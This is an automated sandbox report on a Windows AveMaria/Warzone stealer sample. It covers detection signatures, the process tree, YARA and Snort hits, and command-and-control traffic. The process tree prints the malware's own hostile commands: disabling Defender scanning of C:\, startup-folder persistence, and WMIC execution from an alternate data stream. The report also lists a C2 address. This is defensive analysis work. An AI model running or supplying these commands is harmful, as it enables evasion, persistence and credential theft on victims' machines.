Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Jaik.73085.20962.11149

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Jaik.73085.20962.11149 (renamed file extension from 11149 to exe)
Analysis ID:626897
MD5:35ed3fe203fabde1b0d353815f9a273b
SHA1:6a5e219fd96905b154295697ac6f72a13725f6a1
SHA256:8d4020bea8924365724ff2c7eaffa0541f0ac4712c6b0a4723c5f68858fa306c
Tags:exe
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Sigma detected: Drops script at startup location
Multi AV Scanner detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Installs a global keyboard hook
Writes to foreign memory regions
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Creates processes via WMI
Allocates memory in foreign processes
Drops script or batch files to the startup folder
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Creates files in alternative data streams (ADS)
Contains functionality to create processes via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.Jaik.73085.20962.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe" MD5: 35ED3FE203FABDE1B0D353815F9A273B)
    • powershell.exe (PID: 5900 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • windowupdate.exe (PID: 5732 cmdline: C:\ProgramData\windowupdate.exe MD5: 35ED3FE203FABDE1B0D353815F9A273B)
      • powershell.exe (PID: 316 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1636 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cmd.exe (PID: 6080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 5596 cmdline: wmic process call create '"C:\ProgramData:ApplicationData"' MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
  • WmiPrvSE.exe (PID: 1824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "104.128.191.44", "port": 8080}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmpCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
  • 0x4fd0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
  • 0x4fd0:$c1: Elevation:Administrator!new:
00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 45 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.3.windowupdate.exe.1084250.2.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          3.3.windowupdate.exe.1084250.2.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
          • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
          • 0xd80:$c1: Elevation:Administrator!new:
          3.3.windowupdate.exe.1084250.2.raw.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            3.3.windowupdate.exe.10be378.0.raw.unpackCodoso_Gh0st_2Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            3.3.windowupdate.exe.10be378.0.raw.unpackCodoso_Gh0st_1Detects Codoso APT Gh0st MalwareFlorian Roth
            • 0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
            • 0xd80:$c1: Elevation:Administrator!new:
            Click to see the 97 entries

            Sigma Signatures

            Data Obfuscation

            barindex
            Sigma detected: Drops script at startup location
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat

            Snort Signatures

            Timestamp:104.128.191.44192.168.2.38080496942841903 05/15/22-21:37:58.748904
            SID:2841903
            Source Port:8080
            Destination Port:49694
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3104.128.191.444969480802834979 05/15/22-21:37:58.879218
            SID:2834979
            Source Port:49694
            Destination Port:8080
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "104.128.191.44", "port": 8080}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeReversingLabs: Detection: 17%
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData:ApplicationDataReversingLabs: Detection: 17%
            Source: C:\ProgramData\windowupdate.exeReversingLabs: Detection: 17%
            Source: 3.3.windowupdate.exe.10928d8.10.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.3.windowupdate.exe.10928d8.12.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.2.windowupdate.exe.38d0000.3.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpackAvira: Label: TR/Redcap.ghjpt
            Source: 3.3.windowupdate.exe.10928d8.4.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.2.windowupdate.exe.2ed053f.1.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpackAvira: Label: TR/Patched.Ren.Gen3
            Source: 3.3.windowupdate.exe.10928d8.5.unpackAvira: Label: TR/Patched.Ren.Gen3

            Exploits

            barindex
            Yara detected UACMe UAC Bypass tool
            Source: Yara matchFile source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Variant.Jaik.73085.20962.exe PID: 5708, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: windowupdate.exe PID: 5732, type: MEMORYSTR

            Compliance

            barindex
            Detected unpacking (creates a PE file in dynamic memory)
            Source: C:\ProgramData\windowupdate.exeUnpacked PE file: 3.2.windowupdate.exe.5220000.5.unpack
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wuser32.pdb source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\debug.pdb source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr
            Source: Binary string: wuser32.pdbUGP source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009ADAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_009ADAE0
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00D9DAE0 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,3_2_00D9DAE0
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2841903 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) 104.128.191.44:8080 -> 192.168.2.3:49694
            Source: TrafficSnort IDS: 2834979 ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin 192.168.2.3:49694 -> 104.128.191.44:8080
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 104.128.191.44
            Source: Joe Sandbox ViewASN Name: EPBTELECOMUS EPBTELECOMUS
            Source: global trafficTCP traffic: 192.168.2.3:49694 -> 104.128.191.44:8080
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: unknownTCP traffic detected without corresponding DNS query: 104.128.191.44
            Source: powershell.exe, 0000000D.00000003.411093654.000000000917F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.388775306.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412820303.0000000004641000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.389408114.00000000045EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.412976315.0000000004783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
            Source: powershell.exe, 00000001.00000003.382885100.0000000007B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.385315234.0000000007BAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000003.383555084.0000000007BAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5n

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\ProgramData\windowupdate.exeWindows user hook set: 0 keyboard low level C:\ProgramData\windowupdate.exeJump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputData

            E-Banking Fraud

            barindex
            Yara detected AveMaria stealer
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271131507.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.271207797.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310518053.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.3.windowupdate.exe.1084250.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.3.windowupdate.exe.10be378.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ee89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea4ff8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a789af.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea7e00.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.3.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.ea6868.6.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 3.2.windowupdate.exe.2ed053f.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.2a6053f.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
